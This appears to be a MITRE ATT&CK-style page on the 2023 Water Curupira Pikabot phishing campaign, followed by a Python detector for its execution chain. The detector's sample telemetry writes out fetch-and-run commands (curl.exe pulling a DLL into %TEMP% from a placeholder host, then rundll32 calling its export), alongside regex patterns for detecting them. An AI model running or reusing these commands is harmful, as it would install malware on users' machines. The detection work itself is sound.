Water Curupira Pikabot Distribution

Water Curupira Pikabot Distribution was a 2023 campaign in which an entity linked to BlackBasta ransomware deployment distributed Pikabot via email attachments. The activity followed the takedown of QakBot and showed several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, and it coincided with campaigns delivering DarkGate and IcedID en route to ransomware deployment.[1]

ID: C0037
First Seen: January 2023 [1]
Last Seen: December 2023 [1]
Contributors: Inna Danilevich, U.S. Bank
Version: 1.0
Created: 17 July 2024
Last Modified: 28 October 2024

Techniques Used

Domain  ID  Name  Use

Enterprise T1059.003 Command and Scripting Interpreter: Windows Command Shell
    Use: Water Curupira Pikabot Distribution installation via JavaScript launched follow-on commands through cmd.exe.[1]

Enterprise T1059.007 Command and Scripting Interpreter: JavaScript
    Use: Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information
    Use: Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.[1]

Enterprise T1589.002 Gather Victim Identity Information: Email Addresses
    Use: Water Curupira Pikabot Distribution used thread spoofing of existing email threads to conduct spearphishing operations.[1]

Enterprise T1105 Ingress Tool Transfer
    Use: Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.[1]

Enterprise T1566.001 Phishing: Spearphishing Attachment
    Use: Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.[1]

Enterprise T1218.011 System Binary Proxy Execution: Rundll32
    Use: Water Curupira Pikabot Distribution used rundll32.exe to execute the final Pikabot payload, calling the named export Crash or Limit depending on the variant.[1]

Enterprise T1204 User Execution
    Use: Water Curupira Pikabot Distribution required users to interact with malicious attachments in order to start the Pikabot installation.[1]

Enterprise T1204.001 User Execution: Malicious Link
    Use: Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.[1]

Enterprise T1204.002 User Execution: Malicious File
    Use: Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or as IMG files containing an LNK mimicking a Word document together with a malicious DLL.[1]
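The execution chain listed above (script host launching cmd.exe, curl.exe fetching the payload into the temp directory, rundll32.exe calling the Crash or Limit export) is visible in ordinary process-creation telemetry. The following detection sketch is an added example written for this page; it is not code from the referenced report or from ATT&CK. It assumes Sysmon Event ID 1-style events serialised as JSON lines with the field names ts, host, parent_image, image and cmdline (an assumption about the log format), and every event, host, path and URL in it is constructed for illustration.

```python
"""Detection sketch for the Pikabot delivery chain described on this page.

Added example (not from the referenced report): scans process-creation
telemetry for the three execution behaviours the campaign lists and then
correlates them per host. All sample events below are constructed.
"""
import json
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (assumed JSON-lines schema). Backslashes are
# doubled because the text is JSON; json.loads restores single backslashes.
SAMPLE_EVENTS = r"""
{"ts": "2023-05-11T09:12:01Z", "host": "WS01", "parent_image": "C:\\Windows\\System32\\wscript.exe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c curl.exe -o %TEMP%\\upd.dll https://example.invalid/p.png"}
{"ts": "2023-05-11T09:12:02Z", "host": "WS01", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -o C:\\Users\\alice\\AppData\\Local\\Temp\\upd.dll https://example.invalid/p.png"}
{"ts": "2023-05-11T09:12:05Z", "host": "WS01", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\rundll32.exe", "cmdline": "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\upd.dll,Crash"}
{"ts": "2023-05-11T09:20:00Z", "host": "WS02", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe"}
{"ts": "2023-05-11T09:21:00Z", "host": "WS02", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\rundll32.exe", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"}
{"ts": "2023-05-11T09:22:00Z", "host": "WS02", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -o C:\\tools\\data.json https://example.invalid/api"}
"""

# Detection tags keyed to the ATT&CK IDs listed on this page.
TAG_SCRIPT_CMD = "T1059.003/T1059.007 script host spawning cmd.exe"
TAG_CURL_TEMP = "T1105 curl.exe writing a download into a temp directory"
TAG_RUNDLL_EXPORT = "T1218.011 rundll32.exe invoking export Crash/Limit"

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TEMP_DIR_RE = re.compile(r"\\temp\\|%temp%", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# rundll32 <path>.dll,<export>; the export names Crash and Limit come from the
# campaign description above.
RUNDLL_EXPORT_RE = re.compile(
    r'rundll32(?:\.exe)?\s+.+?\.dll"?\s*,\s*(crash|limit)\b', re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the detection tags that match one process-creation event."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("cmdline", "")
    tags = []
    if image == "cmd.exe" and parent in SCRIPT_HOSTS:
        tags.append(TAG_SCRIPT_CMD)
    if image == "curl.exe" and URL_RE.search(cmdline) and TEMP_DIR_RE.search(cmdline):
        tags.append(TAG_CURL_TEMP)
    if image == "rundll32.exe" and RUNDLL_EXPORT_RE.search(cmdline):
        tags.append(TAG_RUNDLL_EXPORT)
    return tags


def scan(jsonl: str) -> list[dict]:
    """Parse JSON-lines telemetry and keep only the events that matched a rule."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        tags = classify(event)
        if tags:
            hits.append({"ts": event["ts"], "host": event["host"],
                         "image": basename(event["image"]), "findings": tags})
    return hits


def correlate(hits: list[dict], window: timedelta = timedelta(minutes=5)) -> list[str]:
    """Hosts on which all three stages fired within `window` (the full chain)."""
    needed = {TAG_SCRIPT_CMD, TAG_CURL_TEMP, TAG_RUNDLL_EXPORT}
    by_host: dict[str, list[tuple[datetime, str]]] = {}
    for hit in hits:
        ts = datetime.fromisoformat(hit["ts"].replace("Z", "+00:00"))
        for tag in hit["findings"]:
            by_host.setdefault(hit["host"], []).append((ts, tag))
    chained = []
    for host, items in by_host.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {tag for ts, tag in items[i:] if ts - start <= window}
            if needed <= seen:
                chained.append(host)
                break
    return chained


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["ts"], hit["host"], hit["image"], "->", "; ".join(hit["findings"]))
    print("full chain observed on:", correlate(scan(SAMPLE_EVENTS)))
```

Each rule on its own is noisy (administrators run curl.exe and rundll32.exe legitimately, and the benign WS02 events show the individual rules staying quiet on ordinary usage), so correlate() raises confidence by requiring all three stages on one host inside a short window, which matches the tightly sequenced installer behaviour described above.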

Software

ID  Name  Description

S1111 DarkGate
    Water Curupira Pikabot Distribution activity included distribution of DarkGate en route to ransomware execution.[1]

S0483 IcedID
    Water Curupira Pikabot Distribution included distribution of IcedID en route to ransomware deployment.[1]

S1145 Pikabot
    Water Curupira Pikabot Distribution distributed Pikabot as an initial access mechanism.[1]

References